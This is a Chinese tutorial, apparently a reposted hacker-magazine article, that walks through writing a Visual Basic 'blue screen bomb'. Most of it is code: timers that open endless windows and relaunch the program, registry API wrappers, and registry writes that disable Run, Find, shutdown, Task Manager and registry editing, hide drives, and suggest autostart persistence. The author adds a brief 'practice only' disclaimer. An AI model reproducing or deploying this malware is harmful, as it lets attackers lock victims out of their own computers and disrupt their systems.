知已知彼看黑客怎么编写强力蓝屏炸弹

　　新的一年又到来了，和我的朋友们都在忙着赶项目，就在我一个不小心写出了一个死循环时，想起了一种很古老的炸弹---蓝屏死机炸弹，于是我就有了写炸弹这个想法，因为我用的是C#.net，把源代码拿过来，大家想调试还要安装.net框架，于是我就想到了用VB来写，那么下面就让我们来进入正题吧。

　　一、弹要实现的功能

　　既然是炸弹，那当然要写的厉害些，首先就要像很久以前那个网页炸弹一样，弹出无数个窗口，这个功能是给别人打马虎眼的，让他一心想着去阻止炸弹继续的弹出窗口；第二个功能是专门针对windows XP而做的，当然也是在2004年第12期黑防杂志上看到的---自动重启计算机（如图1），

　　那么下一项就是让每一个人都感到郁闷的事---修改注册表。我今天教大家写的炸弹实现的功能大部分还是靠注册表，主要的功能还是要禁止中招的人打开任务管理器，禁止使用注册表，隐藏桌面所有图标，禁止使用开始菜单里面的运行，搜索，关机，屏蔽ctrl+alt+del里的内容，禁止使用IE浏览器里的所有属性，屏蔽C盘，D盘等盘，这样的结果看上去一定很可怕，如果我们屏蔽右键或者加那么一点点的代码设成开机自动运行，那后果会是什么样的就可想而知了吧？

　　二、代码实现

　　下面让我们打开VB编译器，在窗体上面加3个timer控件，然后Interval属性设得尽量小点，该属性1000为1秒，我的设成了6，这样在一秒就会谈出上百个窗口了。
实现代码如下：

Private Sub Timer1_Timer()
Dim a As New Form1 ‘声明以后出现a就是代表Form1
a.Show ‘Form1弹出
End Sub

Private Sub Timer2_Timer()
Shell App.EXEName ‘运行这个软件的本身
End Sub
然后隐藏窗体本身，书县代码如下：

Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long ‘这是调用API函数来关闭注册表
Declare Function RegCreateKeyEx Lib "advapi32.dll" Alias "RegCreateKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal Reserved As Long, ByVal lpClass As String, ByVal dwOptions As Long, ByVal samDesired As Long, ByVal lpSecurityAttributes As Long, phkResult As Long, lpdwDisposition As Long) As Long ‘这是调用AP函数在注册表里创建一个键
Declare Function RegOpenKeyEx Lib "advapi32.dll" Alias "RegOpenKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long    ‘这是调用api函数打开注册表
Declare Function RegQueryValueExString Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, ByVal lpData As String, lpcbData As Long) As Long
Declare Function RegQueryValueExLong Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, lpData As Long, lpcbData As Long) As Long
Declare Function RegQueryValueExNULL Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, ByVal lpData As Long, lpcbData As Long) As Long
Declare Function RegSetValueExString Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpValue As String, ByVal cbData As Long) As Long ‘调用API来设置注册表里的键名
Declare Function RegSetValueExLong Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpValue As Long, ByVal cbData As Long) As Long
Private Declare Function RegDeleteKey& Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal hKey As Long, ByVal lpSubKey As String)   ‘调用API删除注册表里的的键
Private Declare Function RegDeleteValue& Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal hKey As Long, ByVal lpValueName As String) ‘调用API删除注册表里的的键值

　API声明完了，下面我们就做相应的定义吧，实现代码如下：

Public Function DeleteKey(lPredefinedKey As Long, sKeyName As String)
    Dim lRetVal As Long
    Dim hKey As Long

    lRetVal = RegOpenKeyEx(lPredefinedKey, sKeyName, 0, KEY_ALL_ACCESS, hKey)
    lRetVal = RegDeleteKey(lPredefinedKey, sKeyName)
    RegCloseKey (hKey)      ‘关闭注册表
End Function
‘以上是用来做删除注册表里的键的

Public Function DeleteValue(lPredefinedKey As Long, sKeyName As String, sValueName As String)
Dim lRetVal As Long
Dim hKey As Long

       lRetVal = RegOpenKeyEx(lPredefinedKey, sKeyName, 0, KEY_ALL_ACCESS, hKey)
       lRetVal = RegDeleteValue(hKey, sValueName)
       RegCloseKey (hKey)
End Function
‘以上是用来删除键值的
Public Function SetValueEx(ByVal hKey As Long, sValueName As String, lType As Long, vValue As Variant) As Long
    Dim lValue As Long
    Dim sValue As String

    Select Case lType
        Case REG_SZ
            sValue = vValue
            SetValueEx = RegSetValueExString(hKey, sValueName, 0&, lType, sValue, Len(sValue)) ‘这里是说明将键设成REG_SZ时就是字符串
        Case REG_DWORD
            lValue = vValue
SetValueEx = RegSetValueExLong(hKey, sValueName, 0&, lType, lValue, 4)
‘如果将键设成REG_DWORD就是长整型
        End Select

End Function
‘以上是用来定义设置键的
Function QueryValueEx(ByVal lhKey As Long, ByVal szValueName As String, vValue As Variant) As Long
    Dim cch As Long
    Dim lrc As Long
    Dim lType As Long
    Dim lValue As Long
    Dim sValue As String

On Error GoTo QueryValueExError

lrc = RegQueryValueExNULL(lhKey, szValueName, 0&, lType, 0&, cch)
If lrc <> ERROR_NONE Then Error 5

    Select Case lType
        Case REG_SZ:
            sValue = String(cch, 0)
            lrc = RegQueryValueExString(lhKey, szValueName, 0&, lType, sValue, cch)
            If lrc = ERROR_NONE Then
                vValue = Left$(sValue, cch)
            Else
                vValue = Empty
            End If
‘如果键是REG_SZ那么键值就是字符型
        Case REG_DWORD:
            lrc = RegQueryValueExLong(lhKey, szValueName, 0&, lType, lValue, cch)
If lrc = ERROR_NONE Then vValue = lValue
Case Else
            lrc = -1
‘如果键是REG_DWORD那么键值就是长整型

End Select

QueryValueExExit:

QueryValueEx = lrc
Exit Function

QueryValueExError:

Resume QueryValueExExit

End Function
‘以上是用来设置注册表键值的
Public Function CreateNewKey(lPredefinedKey As Long, sNewKeyName As String)
    Dim hNewKey As Long
    Dim lRetVal As Long

    lRetVal = RegCreateKeyEx(lPredefinedKey, sNewKeyName, 0&, vbNullString, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, 0&, hNewKey, lRetVal)
    RegCloseKey (hNewKey)
End Function
‘以上是用来创建一个新的键的
Public Function SetKeyValue(lPredefinedKey As Long, sKeyName As String, sValueName As String, vValueSetting As Variant, lValueType As Long)
       Dim lRetVal As Long
       Dim hKey As Long

       lRetVal = RegOpenKeyEx(lPredefinedKey, sKeyName, 0, KEY_ALL_ACCESS, hKey)
       lRetVal = SetValueEx(hKey, sValueName, lValueType, vValueSetting)
       RegCloseKey (hKey)

End Function

Public Function QueryValue(lPredefinedKey As Long, sKeyName As String, sValueName As String)
       Dim lRetVal As Long
       Dim hKey As Long
       Dim vValue As Variant

       lRetVal = RegOpenKeyEx(lPredefinedKey, sKeyName, 0, KEY_ALL_ACCESS, hKey)
       lRetVal = QueryValueEx(hKey, sValueName, vValue)
       QueryValue = vValue
       RegCloseKey (hKey)
End Function
‘以上是用来设置新键的键值的

到这里，所有的模块里的代码就写完了，如果想得到更详细的代码请查看光盘中相关栏目里的代码吧！

　　然后介绍一下我们怎么去给注册表加键和键值吧，具体代码如下：

CreateNewKeyHKEY_CURRENT_USER,"Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
SetKeyValueHKEY_CURRENT_USER,"Software/Microsoft/Windows/CurrentVersion/Policies/Explorer", " NoRun ", "1", REG_DWORD
以上是在HKEY_CURRENT_USER,
"Software/Microsoft/Windows/CurrentVersion/Policies/Explorer里面加上一个键并设置键值为1的REG_DWORD格式，这个是用来屏蔽开始菜单里的运行的，

CreateNewKeyHKEY_CURRENT_USER,"Software/Microsoft/Windows/CurrentVersion/Policies/Explorer"
SetKeyValueHKEY_CURRENT_USER,"Software/Microsoft/Windows/CurrentVersion/Policies/Explorer", "NoFind", "1", REG_DWORD
这段代码是用来屏蔽查找的，就是说在你的计算机的开始菜单里会找不到这一项，

CreateNewKeyHKEY_CURRENT_USER,"Software/Microsoft/Windows/CurrentVersion/Policies/Explorer"
SetKeyValueHKEY_CURRENT_USER,"Software/Microsoft/Windows/CurrentVersion/Policies/Explorer", "NoClose", "1", REG_DWORD
这段是用来屏蔽关闭计算机的

CreateNewKeyHKEY_CURRENT_USER,"Software/Microsoft/Windows/CurrentVersion/Policies/System"
SetKeyValueHKEY_CURRENT_USER,"Software/Microsoft/Windows/CurrentVersion/Policies/System", "DisableTaskMgr", "1", REG_DWORD
这段是用来屏蔽任务管理器的

CreateNewKeyHKEY_CURRENT_USER,"Software/Microsoft/Windows/CurrentVersion/Policies/System"
SetKeyValueHKEY_CURRENT_USER,"Software/Microsoft/Windows/CurrentVersion/Policies/System", "DisableRegistryTools", "1", REG_DWORD
这段是用来禁止使用注册表的

CreateNewKeyHKEY_CURRENT_USER,"Software/Microsoft/Windows/CurrentVersion/Policies/Explorer"
SetKeyValueHKEY_CURRENT_USER,"Software/Microsoft/Windows/CurrentVersion/Policies/Explorer", "NoDrives", "1", REG_DWORD
这段是用来屏蔽A盘的，键值1代表A盘，2代表B盘，4代表C盘，8代表D盘，就是说二倍二倍的下去代表下一个盘。

　　如果想作出厉害一点的炸弹，最好多多的了解如何使用API函数和注册表，如果想得到更详细的源代码就在杂志相关栏目里面能够找到，这样，一个小巧而又厉害的炸弹就诞生了，希望大家仅仅是用这个东西来练习，而不是去作坏事。我写完了炸弹后，又写了一个针对这个炸弹的还原的工具收集在光盘里面了。

	\| 帮助(？) \| 版权声明 \| 友情连接 \| 关于我们 \| 信息发布
Copyright 2007 www.vipcn.com All Rights Reserved.	鄂ICP备05000083号Powered by:vipcn

知已知彼 看黑客怎么编写强力蓝屏炸弹

知已知彼看黑客怎么编写强力蓝屏炸弹